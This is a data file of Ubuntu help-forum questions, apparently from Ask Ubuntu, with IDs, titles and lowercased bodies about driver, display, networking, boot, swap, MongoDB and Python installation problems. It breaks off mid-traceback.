359165	what 32-bit version of ubuntu will work fast on my laptop ?	i have an old dell inspiron 1000 . here are the specs : • cpu type : mobile intel celeron • cpu frequency:2.20 ghz • hard drive size : 30gb • shadow ram:384kb • cache ram:256kb • ram speed:226mhz • system memory : 640kb the bios said 256mb of ram , i got the above from the system summary before boot . if you need more info i will be glad to post it . i want an ubuntu distro that i can install on this old piece of junk so i can use it for school . thanks .
359166	is it possible to reset shotwell 14.01 to its default state ?	i know the question could sound as duplicate , but i were not able to find anything suitable to solve the problem . however i have changed some of photography names in my photo collection , but shotwell is still remembering old names of mentioned images . tried to change shotwell 's directories names to force shotwell to regenerate a new configuration file/directory/db with no luck . removed and re-imported my photo collection from different directory , shotwell still remembers old names . purged shotwell , manually deleted shotwell files in .local and .cache then reinstalled it again , but shotwell still remembers old image names . any suggestions ? shotwell version 14.01 ubuntu version 12.04 lts
359179	udev rules for multiple usb game controllers ( including dual controllers )	using xbmcbuntu eden ... i 'm having trouble creating udev rules for my controllers . i have a dual arcade stick that has two separate usb connections , and i am having no trouble writing the udev rules for these because they show up as separate usb devices , but i also have a mayflash dual n64 adapter , and a dual playstation adapter . each of these show up as a single usb device , and i do n't know how to differentiate between them in the udev matching rules . prior to writing the udev rules , all six controllers were detected as js0 , js1 , js2 ... js5 , but their numbering would be random upon a reboot , which was particularly problematic with mame which i would then have to reconfigure to use the new joystick number ( very tedious ) . the problem is that , for example , if the mayflash adapter is detected as js1 and js2 , i would look at the details with udevadm info -- attribute-walk -- name /dev/input/js1 , but all static properties are identical for js1 and js2 . at this stage i am not concerned about what happens when i change the port they are plugged into as i am happy just to leave them all connected to their respective ports and change the udev rules file if i need to in the future . but , the physical usb connection is the same for both controllers on a single usb input , so this does n't help me . the rules file i have written so far looks like # arcade stick kernel== '' js ? `` , attrs { name } == '' dragonrise inc. generic usb joystick `` , attrs { phys } == '' usb-0000:00:1d.0-2.1/input0 '' , name= '' input/js0 '' kernel== '' js ? `` , attrs { name } == '' dragonrise inc. generic usb joystick `` , attrs { phys } == '' usb-0000:00:1d.0-2.4/input0 '' , name= '' input/js1 '' # n64 kernel== '' js ? `` , attrs { name } == '' huijia usb gamepad '' , attrs { phys } == '' usb-0000:00:1d.0-2.2/input0 '' , name= '' input/js2 '' kernel== '' js ? `` , attrs { name } == '' huijia usb gamepad '' , attrs { phys } == '' usb-0000:00:1d.0-2.2/input0 '' , name= '' input/js3 '' # ps2 kernel== '' js ? `` , attrs { name } == '' twin usb joystick '' , attrs { phys } == '' usb-0000:00:1d.0 2.3/input0 '' , name= '' input/js4 '' kernel== '' js ? `` , attrs { name } == '' twin usb joystick '' , attrs { phys } == '' usb-0000:00:1d.0-2.3/input0 '' , name= '' input/js5 '' obviously , i was n't expecting this to work perfectly because there 's nothing to differentiate between the two ps2 inputs and the two n64 inputs , but i was surprised that even the first of each does not work properly . what i end up with is something like : /dev/input/js0 is dragonrise joystick with kernel == js5 /dev/input/js1 is dragonrise joystick with kernel == js0 /dev/input/js2 is twin usb joystick with kernel == js2 /dev/input/js3 is huijia usb gamepad with kernel == js3 /dev/input/js4 is huijia usb gamepad with kernel == js4 /dev/input/js5 is dragonrise joystick with kernel == js5 so clearly , apart from the first two being renamed from js5 and js0 to js0 and js1 respectively , nothing has been renamed . i have no idea where to go from here , but there must be a way to do it , and i 'm hoping someone here has an idea of how to do this . i think this should be enough info to clearly explain my issue , but happy to provide clarifications if they are needed . thanks in advance : )
359180	how can i change the color of inactive icons in gnome shell panel ( css code ) ?	( disclaimer : i know there are much question about gnome shell panel customization . i 've gone through each one of them and i do not think this one is a duplicate of any . ) i am trying to enhance my gnome shell panel ( gnome shell 3.6 from ubuntu gnome 13.04 ) . my problem is that in the default theme , the panel and the inactive icons are almost the same shade of ... black . see what i mean : i can barely see the ( inactive ) bluetooth icon or the caps and num lock indicators . now , i know how to change the panel background by putting this in a personal them ( in $ home/.themes/mytheme/gnome-shell/gnome-shell.css ) : @ import url ( `` /usr/share/gnome-shell/theme/gnome-shell.css '' ) ; # panel { background-color : darkgreen ; font-weight : bold ; height : 1.86em ; } which makes the icons more visible ... but i would like t change the icon inactive color . this stanza change the `` foreground '' icon color : .panel-button { color : cyan ; } ( and the `` shaded '' color changes too ... ) . what is the trick to change just the shaded/inactive color ?
359188	urxvt with awesome wm and xcompmgr is giving me strange-looking terminals ?	i have n't seen anyone else have this problem . i am running ubuntu 12.04 lts , i believe awesome wm , xcompmgr , and urxvt are all up to date . my transparent terminals often look like this : this problem is fixed in a terminal window when i hover over it , but it comes back often , especially when using curses-like programs . does anyone have any ideas ? what could be the problem here ? my ~/.xdefaults looks like this : ! ! ! this enables transparency . urxvt*.depth : 32 urxvt*.buffered : false urxvt*.transparent : false ! ! ! this disables the scroll bar . urxvt.scrollbar : false ! ! ! this enables the scroll wheel for scrolling . urxvt.secondaryscroll : true ! ! ! colors urxvt.foreground : white urxvt.background : rgba:0000/0000/0000/c900 ! black urxvt.color0 : # 2e3436 urxvt.color8 : # 555753 ! red urxvt.color1 : # cc0000 urxvt.color9 : # ef2929 ! etc ! ! ! font urxvt.font : xft : terminus : pixelsize=14 urxvt.boldfont : xft : terminus : bold : pixelsize=14 ! ! ! enabling clickable links : urxvt.urllauncher : /usr/bin/firefox urxvt.matcher.button : 1 i launch xcompmgr from the bottom of my rc.lua , using the command : os.execute ( `` xcompmgr -cf & '' )
359190	why does an error appear every time i try to open the ubuntu software center ?	there is a glitch on the ubuntu software center and whenever i open it an error appears and it keeps loading and never opens . why does this happen ? i have installed ubuntu 13.04 on a disk and partitioned it . please help me and ask for excess information if you need it . if you know of any duplicates please show me them ! ! i get the following error in a terminal systemerror : e : type ' < ! doctype ' is not known on line 1 in source list /etc/apt/sources.list.d/medibuntu.list the /etc/apt/sources.list.d/medibuntu.list file contains a html document .
359191	no sound , ubuntu 13.04	ok so i just upgraded to ubuntu 13.04 and i have no sound , when i go to sound it shows dummy device . i have upgraded to the latest kernel i believe , its 3.8.0-31-generic . i 've tried all the suggestions on here and none of them seem to work the most common i found is : sudo alsa force-reload when i try that i get this : unloading alsa sound driver modules : ( none loaded ) . loading alsa sound driver modules : ( none to reload ) . so i believe i do n't have the sound drivers even installed . any suggestions ?
359192	dvd burner/reader never recognized dvds since i bought computer . even sys 7	the dvd burner/reader never recognized dvds since i bought computer . even in sys 7 , but cds burn/read fine . the dell is about 1.5 years old but the dvd burner/reader might be older . i 'm a newbie to ubuntu , but i did find an archive online with dvd drivers and i installed through terminal but no go . any ideas ? thanks .
359196	is it possible to revert to windows	is it possible to go back to windows if i already completely replaced it with ubuntu 13.04 ? after using ubuntu , i decided it just was n't for me : - ( , so now i 'm wanting to put microsoft windows back onto my computer . is there any way for me to get windows back ?
359201	step by step install of maas and juju	i am working on understanding the pieces that i am missing in being able to deploy juju across the other maas nodes . i do n't know if i have a step out of place , or missing a few . the maas server handles the dhcp and dns . the router ( which is at 10.0.0.0 ) has dhcp turned off . any assistance is greatly appreciated . when i am at the end i will either get a 409 error , or arbitrary pick tools 1.16.0 error . it is worth mentioning that local , and aws works fine . hopefully with all of these steps spelled out it will help someone else along the way too . updated nov 3 2013 in this scenario for the poc , there are three physical servers . one is a hp dl 140 with 2 cpu 8gb ram , the second server is a dell power edge 860 server 1 cpu w 4 cores and 8 gb ram , and the third is a rackable systems sp5000psl with two cpus and 8gb of ram . they are all able to be on their own seperate network with access to the internet or can be on the first network . ( second network is 10.0.0.0 , and the first is 192.168.1.0 ) steps setting up maas and juju - 12.04 lts clean install ssh only from the package selection during install sudo apt-get install software-properties-common python-software-properties sudo add-apt-repository ppa : maas-maintainers/stable sudo add-apt-repository ppa : juju/stable sudo apt-get update sudo apt-get dist-upgrade sudo reboot sudo apt-get install maas maas-dns maas-dhcp sudo ufw disable sudo reboot - edit /etc/dhcp/dhcpd.conf authoritive subnet 10.0.0.0 netmask 255.255.255.0 { next-server 10.0.0.2 ; filename `` pxelinux.0 '' ; } sudo maas createsuperuser sudo maas-import-pxe-files login to maas http : //10.x.x.x/maas cluster controller configuration for eth0 manage dhcp and dns ip 10.0.0.2 subnet 255.255.255.0 broadcast 10.0.0.0 routerip 10.0.0.1 ip low 10.0.0.5 ip high 10.0.0.180 commissioning default and distro is set at 12.04 default domain is at local sudo maas-cli login maas http : //10.x.x.x/maas/api/1.0 api-key ssh-keygen -t rsa -b 2048 - enter - no password - cat id_rsa.pub and enter key into maas ssh sudo maas-cli maas nodes accept-all ( interestingly enough i only get back [ ] when executing this ) pxe one machine , accept and commision , start and deploy . sudo apt-get install juju-core juju-local maas config : maas : type : maas maas-server : ' : //10.x.x.x:80/maas' maas-oauth : 'maas_api_key' admin-secret : 'nothing' default-series : 'precise' juju switch maas sudo juju bootstrap -- show-log
359202	lenovo s10-3 wireless light does n't work	i 've rencently installed ubuntu 13.04 on a lenovo s10-3 but the wifi light does n't turn on , my wireless device seems to be a broadcom 4313 . the only internet available conection is the wired one . thanks in advance
359203	usb keyboard modules in initramfs	i want to make a ubuntu live cd with an encrypted filesystem.squashfs , which is decrypted in the initramfs . i almost succeeded , but there seems to be last one thing : i ca n't type in the passphrase during initramfs . i use a usb keyboard , during the initramfs process , the leds are all off , and it seems that i ca n't type in anything . but if it comes to the console of initramfs , it works . i 've googled for lots of solutions , they are almost the same , like : `` add `` ohci-pci '' to /etc/initramfs-tools/modules and run `` update-initramfs -c -k all '' finally i got a modules file like this : unix hid_generic usbhid ehci_hcd libcrc32c crc32c zlib_deflate btrfs dm-mod dm-mirror dm-raid45 aes dm-crypt sha256 cbc blkcipher by the way , instead of edit modules and update-initramfs , i opened the initrd.gz and edited the modules file in it . does this make a different ? i have also tried the update-initramfs way , but that does n't work either . a ps2 keyboard works well on it , so it must be the usb keyboard . does anyone know about it ?
359207	how to decrypt the encrypted partition durning bootup in livecd ?	i make a liveusb with a encrypted partition , if i did n't mount it durning bootup , i can decrypted it after logged into desktop . but i want to mount it on /home , since fstab is regenerated during bootup , i edited the initrd.gz to add `` /dev/mapper/home /home ext4 rw 0 0 '' to fstab . i also edited the crypttab before making a livecd , with `` home /dev/sdb2 none luks '' . during bootup , it paused with a console saying `` the disk drive for /home is not ready yet '' , i typed in the passphrase but it did n't work . i just want it like the local ubuntu which proived a box asking for passphrase and then decrypted the partition and mount it /home . anyone knows about it ? thanks in advance !
359208	can not set monitor on 16:9 resolution	i have ubuntu 13.04 with an intel sandybridge graphic card and 2 monitors set . a lg 32 tv in full hd and a lg flatron w1952tq monitor . i has able to set the tv as full hd , but the monitor i can only set it on 1024x78 resolution on 4:3 format . the resolution that is native and i use on windows is 1440x900 16:9 i have followed several guides on the internet that i found , including some that updates the intel video card drivers but still the same issue . i have seen other troubleshoot but i did not had the knowledge to perform them . i am new to linux with a very limited knowledge . any help is welcome . thanks !
359209	how to install the amd catalyst drivers in ubuntu ?	i am wondering has anyone had any luck installing the catalyst drivers on 13.10 and i have had some trouble in the past on 13.04 with kernel 3.10 , and before i upgrade it would be nice know that everything will be in working order .
359213	bluetooth does not identify the devices around the computer ubuntu 12.04	the bluetooth does not work , does not identify the devices around the computer . i would appreciate you to help me . note that initially had both windows and ubuntu to use the bluetooth should start windows and activate bluetooth , reboot with ubuntu and already served , but to restart ubuntu or suspension no longer served . i thought doing the installation from scratch and installing ubuntu only would work , but no . when installing ubuntu ran the bluetooth , but when installing the wifi driver wifi works but the bluetooth does not identify the devices and keeps looking . when i start ubuntu it shows this http : //k42.kn3.net/9/c/7/9/0/f/8ec.jpg thanks for the advice you can give me . greetings .
359215	unable to connect to internet through lan	i am connected both lan cable and wifi with ubuntu . while lan connects to a local gigabit network with no internet gateway . i can not ping google.com or any address in internet . - > if i unplug network cable or `` ifconfig eth0 down '' than wifi network forks fine . - > i can ping to any local ip connected in both network .
359217	ubuntu 13.04 wo n't recognize second monitor	after a long hiatus , i finally decided to get ubuntu desktop back up and running . i recently purchased a second monitor , which i works , as it worked right out of the box with windows . ubuntu however does n't seem to recognize the monitor at all ; at no point am i getting a signal . here are some things i 've tried to fix the problem , but to no avail . 1 : update just about all packages and drivers and restart . 2 : the display subsection in system settings wo n't detect a second monitor ( bby seems to be my primary monitor , although it 's an insignia monitor , and is n't 32 '' either ) . 3 : installed nvidia-settings and nvidia-settings-updates . 4 : switched between all open source and proprietary nvidia video card drivers . 5 : xrandr output ( the second monitor is the vga one ) : dvi-i-1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 708mm x 398mm 1920x1080 60.0*+ 1920x1080i 30.0 1280x1024 75.0 60.0 1280x720 60.0 60.0 1024x768 75.1 70.1 60.0 1440x480i 30.0 800x600 72.2 75.0 60.3 56.2 720x480 59.9 720x480i 59.9 640x480 72.8 75.0 60.0 59.9 720x400 70.1 vga-1 disconnected ( normal left inverted right x axis y axis ) 6 : unplugged and replugged the monitor . edit 1 7 : output of lspic : lancelafontaine @ lancelafontaine-gt5634h : ~ $ lspci 00:00.0 host bridge : intel corporation 82945g/gz/p/pl memory controller hub ( rev 02 ) 00:01.0 pci bridge : intel corporation 82945g/gz/p/pl pci express root port ( rev 02 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 01 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gb/gr ( ich7 family ) lpc interface bridge ( rev 01 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 01 ) 00:1f.2 ide interface : intel corporation nm10/ich7 family sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 01 ) 01:00.0 vga compatible controller : nvidia corporation g86 [ geforce 8500 gt ] ( rev a1 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 01 ) edit 2 8 : attempted some of the solutions on this similar question . stangely enough , it seems that i 'm `` forced '' to use the open source driver for my video card , as seen below . any change applied only results in it immediately resetting itself to the open source option . another note : i ca n't seem to access the `` nvidia x server settings '' opage as een in the other question . the additional drivers tab only yields the above result . seems as though ubuntu is n't recognizing the monitor at all . any one have any ideas ? ps . thanks for keeping my newbiness in mind .
359218	what version of ubuntu will work on an older ( 2002 ) laptop ?	i 've just inherited an older laptop , and i 'm hoping i can make it a faster , more functional and user friendly machine by wiping windows xp professional and installing an open source os . ( windows is highly bothersome at this age , and very slow . ) i 'm mainly using this computer to stream netflix movies . any advice on what linux/ubuntu os will work on an older machine , and where i might get such an os , would be gladly appreciated . thanks for your time . : ) respectfully , ben compaq nx9030 laptop current os : windows xp professional version 2002 , service pack 3 processor : intel pentium m 1.60ghz 590mhz , 480mb of ram
359219	how to install last version of unity in ubuntu 12.04	can you tell me how install last unity version in ubuntu 12.04 ?
359220	can not install kubuntu 12.04.3 with wubi	im trying to install kubuntu 12 with wubi , but i get can not download the metalink and therefore the iso everytime i try to install . my iso name is kubuntu-12.04.3-desktop-i386 im running windows 7 x86 , i also tried the parameter `` -- 32bit '' but nothing works . the last lines of my log : err= [ errno 14 ] http error 404 : not found 10-14 21:50 debug downloader : downloading http : //cdimage.ubuntu.com/kubuntu/daily-live/current/precise-desktop-i386.metalink c : \ubuntu\install 10-14 21:51 error commonbackend : can not download metalink file2 http : //cdimage.ubuntu.com/kubuntu/daily-live/current/precise-desktop-i386.metalink err= [ errno 14 ] http error 404 : not found 10-14 21:51 debug tasklist : finished get_metalink 10-14 21:51 error tasklist : can not download the metalink and therefore the iso traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in call file `` \lib\wubi\backends\common\backend.py '' , line 595 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 406 , in download_iso exception : can not download the metalink and therefore the iso 10-14 21:51 debug tasklist : # cancelling tasklist 10-14 21:51 debug tasklist : # finished tasklist 10-14 21:51 error root : can not download the metalink and therefore the iso traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in call file `` \lib\wubi\backends\common\backend.py '' , line 595 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 406 , in download_iso exception : can not download the metalink and therefore the iso
359221	develop or contribute to ubuntu community	i 'm a newbie to ubuntu development . i have developed many apps for windows . my college and school uses only windows . so , i 'm very familiar with developing in windows . but , when i wanted to switch over to ubuntu , it was very difficult to adopt now , i 'm ok in using ubuntu . i 'm currently interested in doing some basic programs in ubuntu so that i can start contributing in the coming years . i know this is a weird silly question . i went through developer.ubuntu.com . but , it focuses only on mobiles . but , i need to develop for pcs . not in cloud or web . just a simple desktop application . i do n't know where to start . in google , i find a lot of stuff that leads mostly to developer.ubuntu.com . so , bare with me if this question is silly also , i have basic knowledge in css , javascript , c , c++ , java
359222	bridging ethernet and wifi on ubuntu 12.04	i want to make my ubuntu machine an access point for my phone . the ubuntu machine is connected to gigabit ethernet . i wish to make my machine a dhcp server for the phone . so now when the phone sends a request over the wifi to the machine , it should directly forward it to the ethernet . when the ethernet receives a reply , it should filter the reply with its mac address and accordingly forward it to the wifi interface . for this purpose i think i will have to bridge the ethernet and wifi interfaces of my machine and proceed . please guide me with regards to the same . thanks !
359225	ubuntu server raid install	i am installing ubuntu server 13.04 on an ich9r raid controller with 1tb of space ( 5 250gb raid 5 ) . everything goes fine until the point of installing grub . it will not install grub to anywhere but one of the partitions ( dev/mapper/isw_digibbbgij_volume0p1 ) . after installing it to one of the partitions the machine will not boot . my options are ; dev/mapper/control dev/mapper/isw_digibbbgij_volume0 dev/mapper/isw_digibbbgij_volume0p1 dev/mapper/isw_digibbbgij_volume0p2 dev/mapper/isw_digibbbgij_volume0p3 it will not let me select dev/mapper/isw_digibbbgij_volume0 , so i selected the first partition . furthermore the raid is still in initialize due to a limitation with this controler that requires a raid 5 with more than 4 drives to be initialized in the os , which should happen as the os is installed . am i selecting the wrong install point for grub ? if so what should i enter ?
359226	unable to change execute permissions of .sh file	i 'm out with a new problem . i 've downloaded a jdk7.sh file . now i 'm unable to change the permission of the file to allow executing the file as a program . i mark the check box and again it disappears .
359232	how do i install apache , php , and mysql on a usb flash drive in ubuntu ?	how do i install apache , php , and mysql on a usb flash drive in ubuntu ? i know you can do it on windows , but i 'd like to be able to run it from a linux operating system .
359233	ubuntu 12.04 appearance problem	i have problems with ubuntu theme . here is some screenshots : pac manager chrome context menu i tried reset unity , but it is not working alexey @ maka : ~ $ unity -- reset & [ 1 ] 2860 alexey @ maka : ~ $ warning : unity currently default profile , so switching to metacity while resetting the values checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done initializing grid options ... done initializing session options ... done initializing gnomecompat options ... done initializing animation options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done ( compiz:2869 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed initializing unityshell options ... done warn 2013-10-15 13:23:24 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/google-chrome.desktop ' is using a deprecated format for its actions that will be dropped soon . initializing staticswitcher options ... done error 2013-10-15 13:23:25 unity.glib-gobject < unknown > :0 g_object_unref : assertion `g_is_object ( object ) ' failed setting update `` main_menu_key '' setting update `` run_key '' ^c alexey @ maka : ~ $ pac started ( pac ) with pid 3059 info : used config file '/home/alexey/.config/pac/pac.nfreeze' info : using 'standard gnome2 ' tray icon warn 2013-10-15 13:27:29 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application756416830 error 2013-10-15 13:27:31 unity.glib-gobject < unknown > :0 g_object_set_qdata : assertion `g_is_object ( object ) ' failed pac finishing ( pac ) with pid 3059 warn 2013-10-15 13:27:31 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application1130345297 warn 2013-10-15 13:27:31 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application1130345297 error 2013-10-15 13:27:31 unity.gtk < unknown > :0 gtk_window_resize : assertion `width > 0 ' failed warn 2013-10-15 13:27:31 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application885622223 warn 2013-10-15 13:27:31 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application885622223 error 2013-10-15 13:27:34 unity.glib-gobject < unknown > :0 g_object_set_qdata : assertion `g_is_object ( object ) ' failed warn 2013-10-15 13:27:41 unity.hud.hud hud.cpp:185 attempted to close the hud connection without starting it warn 2013-10-15 13:27:47 unity.hud.hud hud.cpp:185 attempted to close the hud connection without starting it warn 2013-10-15 13:28:02 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application756416830 error 2013-10-15 13:28:03 unity < unknown > :0 bamf_view_get_children : assertion `bamf_is_view ( view ) ' failed error 2013-10-15 13:28:04 unity.glib-gobject < unknown > :0 g_object_set_qdata : assertion `g_is_object ( object ) ' failed warn 2013-10-15 13:28:10 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application756416830 error 2013-10-15 13:28:12 unity.glib-gobject < unknown > :0 g_object_set_qdata : assertion `g_is_object ( object ) ' failed warn 2013-10-15 13:28:45 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application1195209401 error 2013-10-15 13:28:46 unity < unknown > :0 bamf_view_get_children : assertion `bamf_is_view ( view ) ' failed error 2013-10-15 13:28:47 unity.glib-gobject < unknown > :0 g_object_set_qdata : assertion `g_is_object ( object ) ' failed warn 2013-10-15 13:28:52 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application1830183592 warn 2013-10-15 13:28:52 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application1830183592 error 2013-10-15 13:28:54 unity < unknown > :0 bamf_view_get_children : assertion `bamf_is_view ( view ) ' failed error 2013-10-15 13:28:54 unity.glib-gobject < unknown > :0 g_object_set_qdata : assertion `g_is_object ( object ) ' failed any ideas how to solve it ?
359237	unable to install java on my ubuntu	whenever i try to install java on my ubuntu , it show error like package dependencies can not be resolved . this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time .
359238	swap drive not turning on when i log in	recently i added a new 40gb hard drive as swap . i want the swap to be enabled when the computer logs me in . i followed the directions here to make the swap command run on start up . i added swaps.desktop to /etc/xdg/autostart/ as well as to /usr/share/applications/ . inside swaps.desktop is this : [ desktop entry ] name=swap drive autostart exec=swapon -p 32767 /dev/sda5 type=application terminal=false i am sure that the command shown ( swapon -p 32767 /dev/sda5 ) works on its own , but when i restarted the computer , the swap was not enabled . then i made the file supposedly able to be run as myself ( using this ) because the file was not being run at start up : sudo chown root : root /etc/xdg/autostart/ sudo chmod 700 /etc/xdg/autostart/ sudo chown root : root /usr/share/applications/ sudo chmod 700 /usr/share/applications/ i also did sudo visudo and added the lines : administrator all= ( all ) nopasswd : /etc/xdg/autostart/swaps.desktop administrator all= ( all ) nopasswd : /usr/share/applications/swaps.desktop whoami says that i am administrator . end result : when i try to run either swaps.desktop file on their own , i get error : permission denied . but when i run the file with `` open current folder as root '' , it runs flawlessly and my swap space shows up in cat /proc/swaps . what am i doing wrong , and how do i make this work correctly so that the swap is enabled whenever i log in ?
359240	ubuntu 13.04 [ 32bit ] amd with nvidia installing 3.11.5 kernel	after trying to install kernel 3.11.5 my unity does not want to load anymore . so i deleted this kernel and switched back to 3.8 , but still have the same issue - unity does n't load . how can i fix it ? thanks
359244	error : dbpath does not exist	i set dbpath in mongodb config file : # dbpath=/var/lib/mongodb dbpath=~/data/db then try start mongodb but got error : error : dbpath ( ~/data/db ) does not exist . allthough i can check existance of ~/data/db easy : # cd ~/data/db user @ server : ~/data/db # pwd /root/data/db when i run it ... # mongod -- dbpath ~/data/db ... got output : tue oct 15 05:05:49.040 [ initandlisten ] mongodb starting : pid=3786 port=27017 dbpath=/root/data/db 64-bit host=callzone2 tue oct 15 05:05:49.040 [ initandlisten ] db version v2.4.6 tue oct 15 05:05:49.040 [ initandlisten ] git version : b9925db5eac369d77a3a5f5d98a145eaaacd9673 tue oct 15 05:05:49.041 [ initandlisten ] build info : linux ip-10-2-29-40 2.6.21.7-2.ec2.v1.2.fc8xen # 1 smp fri nov 20 17:48:28 est 2009 x86_64 boost_lib_version=1_49 tue oct 15 05:05:49.041 [ initandlisten ] allocator : tcmalloc tue oct 15 05:05:49.041 [ initandlisten ] options : { dbpath : `` /root/data/db '' } tue oct 15 05:05:49.044 [ initandlisten ] exception in initandlisten std : :exception : locale : :facet : :_s_create_c_locale name not valid , terminating tue oct 15 05:05:49.044 dbexit : tue oct 15 05:05:49.044 [ initandlisten ] shutdown : going to close listening sockets ... tue oct 15 05:05:49.044 [ initandlisten ] shutdown : going to flush diaglog ... tue oct 15 05:05:49.044 [ initandlisten ] shutdown : going to close sockets ... tue oct 15 05:05:49.044 [ initandlisten ] shutdown : waiting for fs preallocator ... tue oct 15 05:05:49.044 [ initandlisten ] shutdown : lock for final commit ... tue oct 15 05:05:49.044 [ initandlisten ] shutdown : final commit ... tue oct 15 05:05:49.044 [ initandlisten ] shutdown : closing all files ... tue oct 15 05:05:49.044 [ initandlisten ] closeallfiles ( ) finished tue oct 15 05:05:49.044 [ initandlisten ] shutdown : removing fs lock ... tue oct 15 05:05:49.044 dbexit : really exiting now and client shows that server not started : # mongo mongodb shell version : 2.4.6 connecting to : test tue oct 15 05:08:22.139 error : could n't connect to server 127.0.0.1:27017 at src/mongo/shell/mongo.js:145 exception : connect failed when i run in this way ... # sudo service mongodb restart ... got output in mongo log file : ********************************************************************* error : dbpath ( ~/data/db ) does not exist . create this directory or give existing directory in -- dbpath . see http : //dochub.mongodb.org/core/startingandstoppingmongo ********************************************************************* , terminating tue oct 15 05:10:39.311 dbexit : tue oct 15 05:10:39.311 [ initandlisten ] shutdown : going to close listening sockets ... tue oct 15 05:10:39.311 [ initandlisten ] shutdown : going to flush diaglog ... tue oct 15 05:10:39.311 [ initandlisten ] shutdown : going to close sockets ... tue oct 15 05:10:39.311 [ initandlisten ] shutdown : waiting for fs preallocator ... tue oct 15 05:10:39.311 [ initandlisten ] shutdown : lock for final commit ... tue oct 15 05:10:39.311 [ initandlisten ] shutdown : final commit ... tue oct 15 05:10:39.311 [ initandlisten ] shutdown : closing all files ... tue oct 15 05:10:39.311 [ initandlisten ] closeallfiles ( ) finished tue oct 15 05:10:39.311 dbexit : really exiting now so can not change dbpath . my ubuntu version : # uname -a linux hostname 3.2.0-23-virtual # 36-ubuntu smp tue apr 10 22:29:03 utc 2012 x86_64 x86_64 x86_64 gnu/linux
359245	how to see the home or recent files in guest account of admin account	i want to see my important videos and images from a guest account which is in my brother 's administrator account and the main account is locked by my brother.i have only a guest account and i want to see my document which is kept in home or recent file in the main account i ca n't break the password b'cause i have on permission to do this . tell me the way of enter in the home or recent folder/file of administrator account without breaking the password how can i directly enter in the main account from a guest account ?
359249	update the system software without internet on the same system	i apparently do n't have an internet access for my pc at home and i desperately need to update my ubuntu 12.04 lts . i have internet access in my office . of course i ca n't bring my pc to office . can i somehow download update packages here in office and take then home for my pc . is something like that possible ?
359252	liveusb problem with ati drivers	i created a liveusb to use with my 21.5-inch , mid 2010 imac i3 ati radeon hd 5670 512 mb . every time i boot from the usb stick i get the `` the system is running in low-graphics mode '' i tried the following but nothing works ... sudo apt-get install fglrx installed the ati propritary drivers let me know what kind of log files you wish to see in order to help me troubleshooting this one .
359254	how to install numpy and scipy for python ?	i am tired to try to install numpy and scipy for phyton 2.7.5 , i need this version of python because my final goal it 's to install class ( http : //class-code.net/ ) and montepython ( http : //montepython.net/ ) . ( i have ubuntu 12.04 ) when i tried to import numpy or scipy i get the following error everytime : $ phyton2.7 > > > import numpy traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > file `` /usr/lib/python2.7/dist-packages/numpy/__init__.py '' , line 137 , in < module > import add_newdocs file `` /usr/lib/python2.7/dist-packages/numpy/add_newdocs.py '' , line 9 , in < module > from numpy.lib import add_newdoc file `` /usr/lib/python2.7/dist-packages/numpy/lib/__init__.py '' , line 4 , in < module > from type_check import * file `` /usr/lib/python2.7/dist-packages/numpy/lib/type_check.py '' , line 8 , in < module > import numpy.core.numeric as _nx file `` /usr/lib/python2.7/dist-packages/numpy/core/__init__.py '' , line 5 , in < module > import multiarray importerror : /usr/lib/python2.7/dist-packages/numpy/core/multiarray.so : undefined symbol : pyunicodeucs4_asunicodeescapestring > > import scipy traceback ( most recent call last 